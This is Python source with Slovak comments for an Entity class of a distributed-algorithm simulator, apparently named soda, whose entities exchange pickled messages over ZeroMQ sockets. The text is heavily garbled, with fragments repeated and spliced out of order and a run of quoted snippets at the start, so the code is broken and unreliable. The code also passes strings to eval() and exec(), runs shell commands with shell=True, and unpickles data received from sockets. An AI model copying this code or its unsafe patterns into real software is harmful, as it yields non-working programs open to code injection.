-> {1} -> {2} \".format(_self._id, _Value,_expression))", "| From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý", "Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ", "je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v", "_self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} |", "= _ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors =", "exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value!", "correct output type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout +", "-> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME |", "\"Entity: {0} | Action: EXEC | Wrong value for output cast to float!", "= (_message, ) # Ak je prijímateľ iba jeden pretypujeme ho na pole.", "is tuple: _identifier, _ = _i if type(_j) is str: _j = \"'\"", "to send message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def", "entity, ktoré používateľ opísal v algoritme je nutné predať funkcii # exec() prostredníctvom", "and type(_i) is not tuple: _result.append(True) elif _i != _j and type(_i) is", "def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions", "odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ |", "akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. 
_self.i_SENDER", "\".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined", "exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type", "ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression))", "vzore nieje na poziícii premenná # uložíme si do premennej _result hodnotu True.", "elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info(", "Wrong value for output cast to float! -> {1} -> {2} \".format(_self._id, _Value,", "# a vo vzore nie je na pozícii premenná úložíme hodnotu False. Pre", "import dumps, loads from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior", "\"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop }", "dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a", "entitu o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" %", "pretypujeme ho na pole. if type(_recipients) is int: _recipients = [_recipients] * 1", "_sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny", "= _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages =", "neúspešného odoslania správy. 
_logger.info(\"Entity: {0} | Action: SEND | Trying to send message", "evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__) except NameError as", "| Action: READ | Message : {1} | From entity : {2} \".format(_self._id,", "_output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command,", "% (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become,", "state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový.", "| Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError", "\".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression):", "[18]. Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet #", "universal_newlines=True, shell=True) # cast to correct output type if _output_type == 'string': _process_output", "_process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC", "= _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context =", "_self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. Ak je na rovnakej", "deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states,", "entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER =", "ASSIGN | Wrong type of identifier! 
-> {1} -> {2} \".format(_self._id, _Type, _expression))", "except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of", "exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované všetky", "{2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action:", "Action: ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Type,", "False. Pre pozície # kde je vo vzore premenná si uložíme hodnotu None.", "_completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError", "%s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) #", "argumenty atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie premenných", "V nekonečnom cykle sledujeme, či na soket prišla správa. while True: _socks =", "= %s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, ))", "logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n)", "| Action: BECOME | Old state : {1} | New state : {2}", "_received_message): if _i == _j and type(_i) is not tuple: _result.append(True) elif _i", "správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action:", "= _i if type(_j) is str: _j = \"'\" + _j + \"'\"", "a vo vzore nieje na poziícii premenná # uložíme si do premennej _result", "aby sme mohli následne v metóde run() identifikovať # správanie príslušné tomuto vzoru.", "_out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. 
Zaznamenaný je identifikátor # odosielateľa, prijímateľa", "_self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log,", "Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock", "_pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme", "Action: EXEC | Wrong value for output cast to int! -> {1} ->", "pre entitu o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\"", ": {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného", "a samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1} |", "ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek", "iba jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients = [_recipients]", "# Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná", "_Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1} -> {2}", "to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s", "prijali aby sme mohli následne v metóde run() identifikovať # správanie príslušné tomuto", "TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier!", "if False not in _result: # Pre pozície kde je vo vzore premenná", "poli _result nie je hodnota False znamená to, že prijatá správa # sa", "DEALER from threading import Thread from pickle import dumps, loads from logging import", "-> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} |", "na nový. 
_self._state = _new_state # Ak je tento nový stav terminujúci tak", "= _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours =", "{2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií", "_socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu", "\".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state", "príkaz. Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby mala", "zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i if type(_j) is", "message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity:", "= split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True,", "_self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len", "_p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom.", "Ak je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is int:", "@support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state : {1}", "EXEC | Wrong value for output cast to float! -> {1} -> {2}", "_Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! -> {1}", "_j + \"'\" _expression = \"%s = %s\" % (_identifier, _j) # Využijeme", "| To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError:", "Správu prečítame a následne extrahujeme obsah správy a odosieľatela. 
_pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message,", "akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný # reťazcom", "reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným entity,", "4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode:", "def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state : {1} |", "pozície # kde je vo vzore premenná si uložíme hodnotu None. if len(_pattern[1])", "je na pozícii premenná úložíme hodnotu False. Pre pozície # kde je vo", "_logger.info( \"Entity: {0} | Action: EXEC | Wrong value for output cast to", "read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute,", "import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess", "{0} | Action: ASSIGN | Wrong type of identifier! -> {1} -> {2}", "sa zhoduje so vzorom. if False not in _result: # Pre pozície kde", "_expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression =", "stavu. while _self._state not in _self._term_states: _current_state = _self._state # Entita sa spustí", "_self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID =", "False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else:", "# Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to", "1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND", "valídny Python príkaz. 
Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression.", "AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier!", "= _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol správania príslušného", "a zvýšíme počet # odoslaných správ pre entitu o 1. for _n in", "spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu o", "Entita zmení svoj stav na nový. _self._state = _new_state # Ak je tento", "používateľ opísal v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty", "None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output", "\"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ sa", "opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self)", "= Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in", "Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit()", "def evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__) except NameError", "if _i == _j and type(_i) is not tuple: _result.append(True) elif _i !=", "Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in", "Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if", "add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value):", "\".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme", "terminujúceho stavu. 
while _self._state not in _self._term_states: _current_state = _self._state # Entita sa", "_process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC", "% (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\"", "_process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output", "_expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression =", "= _self._state # Entita sa spustí impulzom alebo začne čítať prijaté správy. if", "remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane", "type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif", "_logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id,", "= deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme, či", "správanie. while _n is not None: # Vykonáme logiku uzlu. Logika uzlov je", "_sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1} | From entity", "= \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output =", "_output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = {", "as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! ->", "@support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(),", "\".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,))", "na prvý uzol správania príslušného pre aktuálny stav. 
_n = _self._states_behaviors[_current_state][_behavior].head _next_node =", "_j = \"'\" + _j + \"'\" _expression = \"%s = %s\" %", "_completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def", "{2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou,", "type(_j) is str: _j = \"'\" + _j + \"'\" _expression = \"%s", "sa spustí impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False", "send message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state):", "_self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je", "funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú", "_Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments", "vo vzore premenná uložíme hodnotu z príslušnej # pozície v správe do tejto", "= False _self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket =", "% (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array,", "-> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output,", "\"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita", "správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state", "pre aktuálny stav. 
_n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie.", "{1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0}", "Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action:", "nezhodujú # a vo vzore nie je na pozícii premenná úložíme hodnotu False.", "# prijali aby sme mohli následne v metóde run() identifikovať # správanie príslušné", "len def read(): # V nekonečnom cykle sledujeme, či na soket prišla správa.", "ActionNode, IfNode from subprocess import run, PIPE from shlex import split from copy", "is str: _j = \"'\" + _j + \"'\" _expression = \"%s =", "of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as", "EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result", "Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node", "\".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre", "Ak je tento nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states:", "prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme je", "Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme", "tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier,", "-> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity:", "| Action: SEND | Message : {1} | To entity : {2} \".format(_self._id,", "_expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong", "prijaté správy. 
if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} |", "if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started", "type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result", "a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN |", "True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol", "je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node =", "+ \"'\" _expression = \"%s = %s\" % (_identifier, _j) # Využijeme akciu", "_self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\"", "a vo vzore nie je na pozícii premenná úložíme hodnotu False. Pre pozície", "a # prijatej správe tá istá hodnota a vo vzore nieje na poziícii", "_logger.info(\"Entity: {0} | Action: READ | Message : {1} | From entity :", "Trying to send message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments", "_term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port", "SEND | Trying to send message to non existing neighbour! -> {1} \".format(_self._id,", "\"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression =", "správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme", "Ak je na rovnakej pozícii vo vzore a # prijatej správe tá istá", "prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. 
_message = _self._actions[\"EVALUATE\"](str(_message)) _recipients", "remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output):", "sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state = _self._state", "Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode:", "uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity:", "except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of", "def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v", "{1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output", "\".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy.", "is not tuple: _message = (_message, ) # Ak je prijímateľ iba jeden", "pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state =", "as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value for output", "úložíme hodnotu False. Pre pozície # kde je vo vzore premenná si uložíme", "ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie", "= _id _self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states =", "result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action:", "odosieľatela. 
_pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED", "_out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) #", "_j and type(_i) is not tuple: _result.append(True) elif _i != _j and type(_i)", "except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of", "odosieľatela a zvýšíme počet # odoslaných správ pre entitu o 1. for _n", "{2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output)", "správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu", "to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0}", "_Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command)", "tuple: _identifier, _ = _i if type(_j) is str: _j = \"'\" +", "type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self)", "try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action:", "cast to correct output type if _output_type == 'string': _process_output = \"'\" +", "% (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme", "is int: _recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový", "_self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier!", "as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! 
-> {1} ->", "tento nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments", "_Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier! -> {1}", "= _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock =", "_self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for", "@support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad", "_output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity:", "float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong", "je hodnota False znamená to, že prijatá správa # sa zhoduje so vzorom.", "tá istá hodnota a vo vzore nieje na poziícii premenná # uložíme si", "# Správu prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT)", "SEND | Message : {1} | To entity : {2} \".format(_self._id, _message, _n))", "_Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN |", "in _result: # Pre pozície kde je vo vzore premenná uložíme hodnotu z", "uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá je jednou zo", "identifier! 
-> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type:", "= run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if", "\".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE", "entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie", "import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle import", "loads from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode,", "_message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity:", "== 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0}", "exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať", "je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND", "# sú uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {},", "_behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol správania", "tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result nie je hodnota", "{1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0}", "_self._state, _new_state)) # Entita zmení svoj stav na nový. _self._state = _new_state #", "'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} |", "cez správanie. while _n is not None: # Vykonáme logiku uzlu. 
Logika uzlov", "{2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action:", "= loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} | From", "{1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN |", "# exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované", "mohli následne v metóde run() identifikovať # správanie príslušné tomuto vzoru. return _pattern", "správu spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu", "import split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self,", "% (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array,", "zhoduje so vzorom. if False not in _result: # Pre pozície kde je", "{0} | Action: BECOME | Old state : {1} | New state :", "\".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command =", "From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa", "prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu spolu s", "int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong", "_n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V", "IfNode from subprocess import run, PIPE from shlex import split from copy import", "type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError", "vzore premenná si uložíme hodnotu None. 
if len(_pattern[1]) == len(_received_message): for _i, _j", "_Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE |", "vo vzore nie je na pozícii premenná úložíme hodnotu False. Pre pozície #", "dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je", "{1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" +", "Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle import dumps,", "Wrong value for output cast to int! -> {1} -> {2} \".format(_self._id, _Value,", "_value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression", "try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message =", "Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID", "_Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value for output cast", "pop } def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho", "_logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier! -> {1} ->", ": {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový. _self._state", "_self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments", "for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ =", "odosielateľa, prijímateľa a samotná správa. 
